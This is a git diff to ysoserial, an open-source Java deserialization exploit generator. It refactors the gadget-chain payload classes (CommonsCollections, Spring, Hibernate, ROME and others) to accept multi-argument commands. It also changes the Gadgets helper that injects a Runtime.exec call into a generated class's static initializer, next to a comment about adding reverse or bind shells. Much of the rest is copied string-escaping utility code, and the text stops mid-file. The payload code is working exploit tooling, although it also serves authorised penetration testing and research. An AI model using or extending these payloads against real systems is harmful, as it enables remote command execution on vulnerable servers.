diff --git a/src/main/java/ysoserial/GeneratePayload.java b/src/main/java/ysoserial/GeneratePayload.java index 88776f34..6c0b5aa8 100644 --- a/src/main/java/ysoserial/GeneratePayload.java +++ b/src/main/java/ysoserial/GeneratePayload.java @@ -3,6 +3,7 @@ import java.io.PrintStream; import java.util.*; +import ysoserial.payloads.ExtendedObjectPayload; import ysoserial.payloads.ObjectPayload; import ysoserial.payloads.ObjectPayload.Utils; import ysoserial.payloads.annotation.Authors; @@ -14,12 +15,12 @@ public class GeneratePayload { private static final int USAGE_CODE = 64; public static void main(final String[] args) { - if (args.length != 2) { + if (args.length < 2) { printUsage(); System.exit(USAGE_CODE); } final String payloadType = args[0]; - final String command = args[1]; + final String[] command = Arrays.copyOfRange(args, 1, args.length); final Class payloadClass = Utils.getPayloadClass(payloadType); if (payloadClass == null) { @@ -31,7 +32,18 @@ public static void main(final String[] args) { try { final ObjectPayload payload = payloadClass.newInstance(); - final Object object = payload.getObject(command); + final Object object; + if (payload instanceof ExtendedObjectPayload) { + ExtendedObjectPayload extended_payload = (ExtendedObjectPayload) payload; + object = extended_payload.getObject(command); + } + else { + if (command.length > 1) { + System.err.println("The payload '" + payloadType + "' does not support arguments"); + } + object = payload.getObject(command[0]); + } + PrintStream out = System.out; Serializer.serialize(object, out); ObjectPayload.Utils.releasePayload(payload, object); @@ -45,7 +57,7 @@ public static void main(final String[] args) { private static void printUsage() { System.err.println("Y SO SERIAL?"); - System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'"); + System.err.println("Usage: java -jar ysoserial-[version]-all.jar payload [arguments ...]"); System.err.println(" Available payload types:"); final List> payloadClasses = diff --git a/src/main/java/ysoserial/Strings.java b/src/main/java/ysoserial/Strings.java index 84c21971..b99d7ee9 100644 --- a/src/main/java/ysoserial/Strings.java +++ b/src/main/java/ysoserial/Strings.java @@ -1,7 +1,5 @@ package ysoserial; -import org.apache.commons.lang.StringUtils; - import java.util.Arrays; import java.util.Comparator; import java.util.LinkedList; @@ -21,6 +19,10 @@ public static String join(Iterable strings, String sep, String prefix, S return sb.toString(); } + public static String join(Iterable strings, String sep) { + return Strings.join(strings, sep, null, null); + } + public static String repeat(String str, int num) { final String[] strs = new String[num]; Arrays.fill(strs, str); diff --git a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java index 2495be77..234c3e8e 100755 --- a/src/main/java/ysoserial/payloads/CommonsBeanutils1.java +++ b/src/main/java/ysoserial/payloads/CommonsBeanutils1.java @@ -14,9 +14,9 @@ @SuppressWarnings({ "rawtypes", "unchecked" }) @Dependencies({"commons-beanutils:commons-beanutils:1.9.2", "commons-collections:commons-collections:3.1", "commons-logging:commons-logging:1.2"}) @Authors({ Authors.FROHOFF }) -public class CommonsBeanutils1 implements ObjectPayload { +public class CommonsBeanutils1 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); // mock method name until armed final BeanComparator comparator = new BeanComparator("lowestSetBit"); diff --git a/src/main/java/ysoserial/payloads/CommonsCollections2.java b/src/main/java/ysoserial/payloads/CommonsCollections2.java index 7df52880..4c34be50 100755 --- a/src/main/java/ysoserial/payloads/CommonsCollections2.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections2.java @@ -27,9 +27,9 @@ @SuppressWarnings({ "rawtypes", "unchecked" }) @Dependencies({ "org.apache.commons:commons-collections4:4.0" }) @Authors({ Authors.FROHOFF }) -public class CommonsCollections2 implements ObjectPayload> { +public class CommonsCollections2 extends ExtendedObjectPayload> { - public Queue getObject(final String command) throws Exception { + public Queue getObject(final String[] command) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); // mock method name until armed final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]); diff --git a/src/main/java/ysoserial/payloads/CommonsCollections3.java b/src/main/java/ysoserial/payloads/CommonsCollections3.java index d780caae..ac3b7bff 100755 --- a/src/main/java/ysoserial/payloads/CommonsCollections3.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections3.java @@ -30,9 +30,9 @@ @PayloadTest ( precondition = "isApplicableJavaVersion") @Dependencies({"commons-collections:commons-collections:3.1"}) @Authors({ Authors.FROHOFF }) -public class CommonsCollections3 extends PayloadRunner implements ObjectPayload { +public class CommonsCollections3 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { Object templatesImpl = Gadgets.createTemplatesImpl(command); // inert chain for setup diff --git a/src/main/java/ysoserial/payloads/CommonsCollections4.java b/src/main/java/ysoserial/payloads/CommonsCollections4.java index 97a763cd..caf45401 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections4.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections4.java @@ -26,9 +26,9 @@ @SuppressWarnings({ "rawtypes", "unchecked", "restriction" }) @Dependencies({"org.apache.commons:commons-collections4:4.0"}) @Authors({ Authors.FROHOFF }) -public class CommonsCollections4 implements ObjectPayload> { +public class CommonsCollections4 extends ExtendedObjectPayload> { - public Queue getObject(final String command) throws Exception { + public Queue getObject(final String[] command) throws Exception { Object templates = Gadgets.createTemplatesImpl(command); ConstantTransformer constant = new ConstantTransformer(String.class); diff --git a/src/main/java/ysoserial/payloads/CommonsCollections5.java b/src/main/java/ysoserial/payloads/CommonsCollections5.java index bc322d69..e8b7b76f 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections5.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections5.java @@ -54,10 +54,10 @@ @PayloadTest ( precondition = "isApplicableJavaVersion") @Dependencies({"commons-collections:commons-collections:3.1"}) @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER }) -public class CommonsCollections5 extends PayloadRunner implements ObjectPayload { +public class CommonsCollections5 extends ExtendedObjectPayload { - public BadAttributeValueExpException getObject(final String command) throws Exception { - final String[] execArgs = new String[] { command }; + public BadAttributeValueExpException getObject(final String[] command) throws Exception { + final String[] execArgs = command.clone(); // inert chain for setup final Transformer transformerChain = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(1) }); diff --git a/src/main/java/ysoserial/payloads/CommonsCollections6.java b/src/main/java/ysoserial/payloads/CommonsCollections6.java index 1412d2b4..b9d9ec85 100644 --- a/src/main/java/ysoserial/payloads/CommonsCollections6.java +++ b/src/main/java/ysoserial/payloads/CommonsCollections6.java @@ -35,11 +35,10 @@ @SuppressWarnings({"rawtypes", "unchecked"}) @Dependencies({"commons-collections:commons-collections:3.1"}) @Authors({ Authors.MATTHIASKAISER }) -public class CommonsCollections6 extends PayloadRunner implements ObjectPayload { +public class CommonsCollections6 extends ExtendedObjectPayload { - public Serializable getObject(final String command) throws Exception { - - final String[] execArgs = new String[] { command }; + public Serializable getObject(final String[] command) throws Exception { + final String[] execArgs = command.clone(); final Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), diff --git a/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java new file mode 100644 index 00000000..cdc01c02 --- /dev/null +++ b/src/main/java/ysoserial/payloads/ExtendedObjectPayload.java @@ -0,0 +1,24 @@ +package ysoserial.payloads; + +import java.util.LinkedList; +import java.util.List; +import java.util.StringTokenizer; + +public abstract class ExtendedObjectPayload implements ObjectPayload { + abstract public T getObject(String[] command) throws Exception; + + /** + * Method to keep backward compatibility with ObjectPayload + * using StringTokenizer used in java.lang.Runtime.exec(String) + */ + @Override + public T getObject(String command) throws Exception { + final StringTokenizer tokenizer = new StringTokenizer(command); + final List commandTokenized = new LinkedList(); + while (tokenizer.hasMoreTokens()) { + commandTokenized.add(tokenizer.nextToken()); + } + final String[] commandTokenizedArray= commandTokenized.toArray(new String[0]); + return this.getObject(commandTokenizedArray); + } +} diff --git a/src/main/java/ysoserial/payloads/Hibernate1.java b/src/main/java/ysoserial/payloads/Hibernate1.java index 01a79cec..2998e0c8 100644 --- a/src/main/java/ysoserial/payloads/Hibernate1.java +++ b/src/main/java/ysoserial/payloads/Hibernate1.java @@ -37,7 +37,7 @@ * @author mbechler */ @Authors({ Authors.MBECHLER }) -public class Hibernate1 implements ObjectPayload, DynamicDependencies { +public class Hibernate1 extends ExtendedObjectPayload implements DynamicDependencies { public static String[] getDependencies () { if ( System.getProperty("hibernate5") != null ) { @@ -96,7 +96,7 @@ public static Object makeHibernate5Getter ( Class tplClass, String method ) t } - public Object getObject ( String command ) throws Exception { + public Object getObject ( String[] command ) throws Exception { Object tpl = Gadgets.createTemplatesImpl(command); Object getters = makeGetter(tpl.getClass(), "getOutputProperties"); return makeCaller(tpl, getters); diff --git a/src/main/java/ysoserial/payloads/JBossInterceptors1.java b/src/main/java/ysoserial/payloads/JBossInterceptors1.java index 7fe37a50..24a1ea8c 100644 --- a/src/main/java/ysoserial/payloads/JBossInterceptors1.java +++ b/src/main/java/ysoserial/payloads/JBossInterceptors1.java @@ -30,9 +30,9 @@ "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1", "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" }) @Authors({ Authors.MATTHIASKAISER }) -public class JBossInterceptors1 implements ObjectPayload { +public class JBossInterceptors1 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { final Object gadget = Gadgets.createTemplatesImpl(command); diff --git a/src/main/java/ysoserial/payloads/JSON1.java b/src/main/java/ysoserial/payloads/JSON1.java index b959671c..21a420f0 100644 --- a/src/main/java/ysoserial/payloads/JSON1.java +++ b/src/main/java/ysoserial/payloads/JSON1.java @@ -66,9 +66,9 @@ "net.sf.ezmorph:ezmorph:1.0.6", "commons-beanutils:commons-beanutils:1.9.2", "org.springframework:spring-core:4.1.4.RELEASE", "commons-collections:commons-collections:3.1" }) @Authors({ Authors.MBECHLER }) -public class JSON1 implements ObjectPayload { +public class JSON1 extends ExtendedObjectPayload { - public Map getObject ( String command ) throws Exception { + public Map getObject ( String[] command ) throws Exception { return makeCallerChain(Gadgets.createTemplatesImpl(command), Templates.class); } diff --git a/src/main/java/ysoserial/payloads/JavassistWeld1.java b/src/main/java/ysoserial/payloads/JavassistWeld1.java index cb1c601f..213b8683 100644 --- a/src/main/java/ysoserial/payloads/JavassistWeld1.java +++ b/src/main/java/ysoserial/payloads/JavassistWeld1.java @@ -30,9 +30,9 @@ "javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1", "org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" }) @Authors({ Authors.MATTHIASKAISER }) -public class JavassistWeld1 implements ObjectPayload { +public class JavassistWeld1 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { final Object gadget = Gadgets.createTemplatesImpl(command); diff --git a/src/main/java/ysoserial/payloads/Jdk7u21.java b/src/main/java/ysoserial/payloads/Jdk7u21.java index 35d25b61..279518c4 100755 --- a/src/main/java/ysoserial/payloads/Jdk7u21.java +++ b/src/main/java/ysoserial/payloads/Jdk7u21.java @@ -57,9 +57,9 @@ @PayloadTest ( precondition = "isApplicableJavaVersion") @Dependencies() @Authors({ Authors.FROHOFF }) -public class Jdk7u21 implements ObjectPayload { +public class Jdk7u21 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); String zeroHashCodeStr = "f5a5a608"; diff --git a/src/main/java/ysoserial/payloads/MozillaRhino1.java b/src/main/java/ysoserial/payloads/MozillaRhino1.java index ea00e647..a6a23449 100644 --- a/src/main/java/ysoserial/payloads/MozillaRhino1.java +++ b/src/main/java/ysoserial/payloads/MozillaRhino1.java @@ -21,9 +21,9 @@ @PayloadTest( precondition = "isApplicableJavaVersion") @Dependencies({"rhino:js:1.7R2"}) @Authors({ Authors.MATTHIASKAISER }) -public class MozillaRhino1 implements ObjectPayload { +public class MozillaRhino1 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError"); Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor(); diff --git a/src/main/java/ysoserial/payloads/ROME.java b/src/main/java/ysoserial/payloads/ROME.java index f0842913..53b18341 100644 --- a/src/main/java/ysoserial/payloads/ROME.java +++ b/src/main/java/ysoserial/payloads/ROME.java @@ -30,9 +30,9 @@ */ @Dependencies("rome:rome:1.0") @Authors({ Authors.MBECHLER }) -public class ROME implements ObjectPayload { +public class ROME extends ExtendedObjectPayload { - public Object getObject ( String command ) throws Exception { + public Object getObject ( String[] command ) throws Exception { Object o = Gadgets.createTemplatesImpl(command); ObjectBean delegate = new ObjectBean(Templates.class, o); ObjectBean root = new ObjectBean(ObjectBean.class, delegate); diff --git a/src/main/java/ysoserial/payloads/Spring1.java b/src/main/java/ysoserial/payloads/Spring1.java index 00638794..24117c07 100644 --- a/src/main/java/ysoserial/payloads/Spring1.java +++ b/src/main/java/ysoserial/payloads/Spring1.java @@ -51,9 +51,9 @@ @PayloadTest ( precondition = "isApplicableJavaVersion") @Dependencies({"org.springframework:spring-core:4.1.4.RELEASE","org.springframework:spring-beans:4.1.4.RELEASE"}) @Authors({ Authors.FROHOFF }) -public class Spring1 extends PayloadRunner implements ObjectPayload { +public class Spring1 extends ExtendedObjectPayload { - public Object getObject(final String command) throws Exception { + public Object getObject(final String[] command) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); final ObjectFactory objectFactoryProxy = diff --git a/src/main/java/ysoserial/payloads/Spring2.java b/src/main/java/ysoserial/payloads/Spring2.java index 11a29072..5d393b7f 100644 --- a/src/main/java/ysoserial/payloads/Spring2.java +++ b/src/main/java/ysoserial/payloads/Spring2.java @@ -43,9 +43,9 @@ "aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2" } ) @Authors({ Authors.MBECHLER }) -public class Spring2 extends PayloadRunner implements ObjectPayload { +public class Spring2 extends ExtendedObjectPayload { - public Object getObject ( final String command ) throws Exception { + public Object getObject ( final String[] command ) throws Exception { final Object templates = Gadgets.createTemplatesImpl(command); AdvisedSupport as = new AdvisedSupport(); diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/src/main/java/ysoserial/payloads/util/Gadgets.java index 851adb40..ab2278ab 100644 --- a/src/main/java/ysoserial/payloads/util/Gadgets.java +++ b/src/main/java/ysoserial/payloads/util/Gadgets.java @@ -10,11 +10,15 @@ import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Proxy; import java.util.HashMap; +import java.util.LinkedList; +import java.util.List; import java.util.Map; import javassist.ClassClassPath; import javassist.ClassPool; import javassist.CtClass; +import ysoserial.Strings; +import ysoserial.translate.JavaEscaper; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; @@ -89,7 +93,7 @@ public static Map createMap ( final String key, final Object val } - public static Object createTemplatesImpl ( final String command ) throws Exception { + public static Object createTemplatesImpl ( final String command[] ) throws Exception { if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { return createTemplatesImpl( command, @@ -102,7 +106,7 @@ public static Object createTemplatesImpl ( final String command ) throws Excepti } - public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) + public static T createTemplatesImpl ( final String command[], Class tplClass, Class abstTranslet, Class transFactory ) throws Exception { final T templates = tplClass.newInstance(); @@ -113,9 +117,12 @@ public static T createTemplatesImpl ( final String command, Class tplClas final CtClass clazz = pool.get(StubTransletPayload.class.getName()); // run command in static initializer // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections - String cmd = "java.lang.Runtime.getRuntime().exec(\"" + - command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + - "\");"; + final List escapedParams = new LinkedList(); + for (String param : command) { + escapedParams.add("\"" + JavaEscaper.escapeJava(param) + "\""); + } + String cmd = "java.lang.Runtime.getRuntime().exec(new String[] {" + Strings.join(escapedParams, ", ") + "});"; + clazz.makeClassInitializer().insertAfter(cmd); // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) clazz.setName("ysoserial.Pwner" + System.nanoTime()); diff --git a/src/main/java/ysoserial/translate/AggregateTranslator.java b/src/main/java/ysoserial/translate/AggregateTranslator.java new file mode 100644 index 00000000..45fec6da --- /dev/null +++ b/src/main/java/ysoserial/translate/AggregateTranslator.java @@ -0,0 +1,68 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +import java.io.IOException; +import java.io.Writer; +import java.util.ArrayList; +import java.util.List; + +/** + * Executes a sequence of translators one after the other. Execution ends whenever + * the first translator consumes codepoints from the input. + * + * @since 1.0 + */ +public class AggregateTranslator extends CharSequenceTranslator { + + /** + * Translator list. + */ + private final List translators = new ArrayList(); + + /** + * Specify the translators to be used at creation time. + * + * @param translators CharSequenceTranslator array to aggregate + */ + public AggregateTranslator(final CharSequenceTranslator... translators) { + if (translators != null) { + for (CharSequenceTranslator translator : translators) { + if (translator != null) { + this.translators.add(translator); + } + } + } + } + + /** + * The first translator to consume codepoints from the input is the 'winner'. + * Execution stops with the number of consumed codepoints being returned. + * {@inheritDoc} + */ + @Override + public int translate(final CharSequence input, final int index, final Writer out) throws IOException { + for (final CharSequenceTranslator translator : translators) { + final int consumed = translator.translate(input, index, out); + if (consumed != 0) { + return consumed; + } + } + return 0; + } + +} \ No newline at end of file diff --git a/src/main/java/ysoserial/translate/CharSequenceTranslator.java b/src/main/java/ysoserial/translate/CharSequenceTranslator.java new file mode 100644 index 00000000..3ec53d1a --- /dev/null +++ b/src/main/java/ysoserial/translate/CharSequenceTranslator.java @@ -0,0 +1,138 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +import java.io.IOException; +import java.io.StringWriter; +import java.io.Writer; +import java.util.Locale; + +/** + * An API for translating text. + * Its core use is to escape and unescape text. Because escaping and unescaping + * is completely contextual, the API does not present two separate signatures. + * + * @since 1.0 + */ +public abstract class CharSequenceTranslator { + + /** + * Array containing the hexadecimal alphabet. + */ + static final char[] HEX_DIGITS = new char[] {'0', '1', '2', '3', + '4', '5', '6', '7', + '8', '9', 'A', 'B', + 'C', 'D', 'E', 'F'}; + + /** + * Translate a set of codepoints, represented by an int index into a CharSequence, + * into another set of codepoints. The number of codepoints consumed must be returned, + * and the only IOExceptions thrown must be from interacting with the Writer so that + * the top level API may reliably ignore StringWriter IOExceptions. + * + * @param input CharSequence that is being translated + * @param index int representing the current point of translation + * @param out Writer to translate the text to + * @return int count of codepoints consumed + * @throws IOException if and only if the Writer produces an IOException + */ + public abstract int translate(CharSequence input, int index, Writer out) throws IOException; + + /** + * Helper for non-Writer usage. + * @param input CharSequence to be translated + * @return String output of translation + */ + public final String translate(final CharSequence input) { + if (input == null) { + return null; + } + try { + final StringWriter writer = new StringWriter(input.length() * 2); + translate(input, writer); + return writer.toString(); + } catch (final IOException ioe) { + // this should never ever happen while writing to a StringWriter + throw new RuntimeException(ioe); + } + } + + /** + * Translate an input onto a Writer. This is intentionally final as its algorithm is + * tightly coupled with the abstract method of this class. + * + * @param input CharSequence that is being translated + * @param out Writer to translate the text to + * @throws IOException if and only if the Writer produces an IOException + */ + public final void translate(final CharSequence input, final Writer out) throws IOException { + if (input == null) { + return; + } + int pos = 0; + final int len = input.length(); + while (pos < len) { + final int consumed = translate(input, pos, out); + if (consumed == 0) { + // inlined implementation of Character.toChars(Character.codePointAt(input, pos)) + // avoids allocating temp char arrays and duplicate checks + final char c1 = input.charAt(pos); + out.write(c1); + pos++; + if (Character.isHighSurrogate(c1) && pos < len) { + final char c2 = input.charAt(pos); + if (Character.isLowSurrogate(c2)) { + out.write(c2); + pos++; + } + } + continue; + } + // contract with translators is that they have to understand codepoints + // and they just took care of a surrogate pair + for (int pt = 0; pt < consumed; pt++) { + pos += Character.charCount(Character.codePointAt(input, pos)); + } + } + } + + /** + * Helper method to create a merger of this translator with another set of + * translators. Useful in customizing the standard functionality. + * + * @param translators CharSequenceTranslator array of translators to merge with this one + * @return CharSequenceTranslator merging this translator with the others + */ + public final CharSequenceTranslator with(final CharSequenceTranslator... translators) { + final CharSequenceTranslator[] newArray = new CharSequenceTranslator[translators.length + 1]; + newArray[0] = this; + System.arraycopy(translators, 0, newArray, 1, translators.length); + return new AggregateTranslator(newArray); + } + + /** + *

Returns an upper case hexadecimal String for the given + * character.

+ * + * @param codepoint The codepoint to convert. + * @return An upper case hexadecimal String + */ + public static String hex(final int codepoint) { + return Integer.toHexString(codepoint).toUpperCase(Locale.ENGLISH); + } + +} \ No newline at end of file diff --git a/src/main/java/ysoserial/translate/CodePointTranslator.java b/src/main/java/ysoserial/translate/CodePointTranslator.java new file mode 100644 index 00000000..7bfacff6 --- /dev/null +++ b/src/main/java/ysoserial/translate/CodePointTranslator.java @@ -0,0 +1,51 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +import java.io.IOException; +import java.io.Writer; + +/** + * Helper subclass to CharSequenceTranslator to allow for translations that + * will replace up to one character at a time. + * + * @since 1.0 + */ +public abstract class CodePointTranslator extends CharSequenceTranslator { + + /** + * Implementation of translate that maps onto the abstract translate(int, Writer) method. + * {@inheritDoc} + */ + @Override + public final int translate(final CharSequence input, final int index, final Writer out) throws IOException { + final int codepoint = Character.codePointAt(input, index); + final boolean consumed = translate(codepoint, out); + return consumed ? 1 : 0; + } + + /** + * Translate the specified codepoint into another. + * + * @param codepoint int character input to translate + * @param out Writer to optionally push the translated output to + * @return boolean as to whether translation occurred or not + * @throws IOException if and only if the Writer produces an IOException + */ + public abstract boolean translate(int codepoint, Writer out) throws IOException; + +} \ No newline at end of file diff --git a/src/main/java/ysoserial/translate/JavaEscaper.java b/src/main/java/ysoserial/translate/JavaEscaper.java new file mode 100644 index 00000000..3278b333 --- /dev/null +++ b/src/main/java/ysoserial/translate/JavaEscaper.java @@ -0,0 +1,33 @@ +package ysoserial.translate; + +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; + +public class JavaEscaper { + public static final Map JAVA_CTRL_CHARS_ESCAPE; + public static final CharSequenceTranslator ESCAPE_JAVA; + + static { + Map initialMap = new HashMap(); + initialMap.put("\b", "\\b"); + initialMap.put("\n", "\\n"); + initialMap.put("\t", "\\t"); + initialMap.put("\f", "\\f"); + initialMap.put("\r", "\\r"); + JAVA_CTRL_CHARS_ESCAPE = Collections.unmodifiableMap(initialMap); + + Map escapeJavaMap = new HashMap(); + escapeJavaMap.put("\"", "\\\""); + escapeJavaMap.put("\\", "\\\\"); + ESCAPE_JAVA = new AggregateTranslator( + new LookupTranslator(Collections.unmodifiableMap(escapeJavaMap)), + new LookupTranslator(JAVA_CTRL_CHARS_ESCAPE), + JavaUnicodeEscaper.outsideOf(32, 0x7f) + ); + } + + public static final String escapeJava(final String input) { + return ESCAPE_JAVA.translate(input); + } +} diff --git a/src/main/java/ysoserial/translate/JavaUnicodeEscaper.java b/src/main/java/ysoserial/translate/JavaUnicodeEscaper.java new file mode 100644 index 00000000..fac65fef --- /dev/null +++ b/src/main/java/ysoserial/translate/JavaUnicodeEscaper.java @@ -0,0 +1,113 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +/** + * Translates codepoints to their Unicode escaped value suitable for Java source. + * + * @since 1.0 + */ +public class JavaUnicodeEscaper extends UnicodeEscaper { + + /** + *

+ * Constructs a JavaUnicodeEscaper above the specified value (exclusive). + *

+ * + * @param codepoint + * above which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static JavaUnicodeEscaper above(final int codepoint) { + return outsideOf(0, codepoint); + } + + /** + *

+ * Constructs a JavaUnicodeEscaper below the specified value (exclusive). + *

+ * + * @param codepoint + * below which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static JavaUnicodeEscaper below(final int codepoint) { + return outsideOf(codepoint, Integer.MAX_VALUE); + } + + /** + *

+ * Constructs a JavaUnicodeEscaper between the specified values (inclusive). + *

+ * + * @param codepointLow + * above which to escape + * @param codepointHigh + * below which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static JavaUnicodeEscaper between(final int codepointLow, final int codepointHigh) { + return new JavaUnicodeEscaper(codepointLow, codepointHigh, true); + } + + /** + *

+ * Constructs a JavaUnicodeEscaper outside of the specified values (exclusive). + *

+ * + * @param codepointLow + * below which to escape + * @param codepointHigh + * above which to escape + * @return the newly created {@code UnicodeEscaper} instance + */ + public static JavaUnicodeEscaper outsideOf(final int codepointLow, final int codepointHigh) { + return new JavaUnicodeEscaper(codepointLow, codepointHigh, false); + } + + /** + *

+ * Constructs a JavaUnicodeEscaper for the specified range. This is the underlying method for the + * other constructors/builders. The below and above boundaries are inclusive when + * between is true and exclusive when it is false. + *

+ * + * @param below + * int value representing the lowest codepoint boundary + * @param above + * int value representing the highest codepoint boundary + * @param between + * whether to escape between the boundaries or outside them + */ + public JavaUnicodeEscaper(final int below, final int above, final boolean between) { + super(below, above, between); + } + + /** + * Converts the given codepoint to a hex string of the form {@code "\\uXXXX\\uXXXX"}. + * + * @param codepoint + * a Unicode code point + * @return the hex string for the given codepoint + */ + @Override + protected String toUtf16Escape(final int codepoint) { + final char[] surrogatePair = Character.toChars(codepoint); + return "\\u" + hex(surrogatePair[0]) + "\\u" + hex(surrogatePair[1]); + } + +} \ No newline at end of file diff --git a/src/main/java/ysoserial/translate/LookupTranslator.java b/src/main/java/ysoserial/translate/LookupTranslator.java new file mode 100644 index 00000000..ebb4c277 --- /dev/null +++ b/src/main/java/ysoserial/translate/LookupTranslator.java @@ -0,0 +1,104 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package ysoserial.translate; + +import java.io.IOException; +import java.io.Writer; +import java.security.InvalidParameterException; +import java.util.HashMap; +import java.util.HashSet; +import java.util.Iterator; +import java.util.Map; + +/** + * Translates a value using a lookup table. + * + * @since 1.0 + */ +public class LookupTranslator extends CharSequenceTranslator { + + /** The mapping to be used in translation. */ + private final Map lookupMap; + /** The first character of each key in the lookupMap. */ + private final HashSet prefixSet; + /** The length of the shortest key in the lookupMap. */ + private final int shortest; + /** The length of the longest key in the lookupMap. */ + private final int longest; + + /** + * Define the lookup table to be used in translation + * + * Note that, as of Lang 3.1 (the orgin of this code), the key to the lookup + * table is converted to a java.lang.String. This is because we need the key + * to support hashCode and equals(Object), allowing it to be the key for a + * HashMap. See LANG-882. + * + * @param lookupMap Map<CharSequence, CharSequence> table of translator + * mappings + */ + public LookupTranslator(final Map lookupMap) { + if (lookupMap == null) { + throw new InvalidParameterException("lookupMap cannot be null"); + } + this.lookupMap = new HashMap(); + this.prefixSet = new HashSet(); + int currentShortest = Integer.MAX_VALUE; + int currentLongest = 0; + Iterator> it = lookupMap.entrySet().iterator(); + + while (it.hasNext()) { + Map.Entry pair = it.next(); + this.lookupMap.put(pair.getKey().toString(), pair.getValue().toString()); + this.prefixSet.add(pair.getKey().charAt(0)); + final int sz = pair.getKey().length(); + if (sz < currentShortest) { + currentShortest = 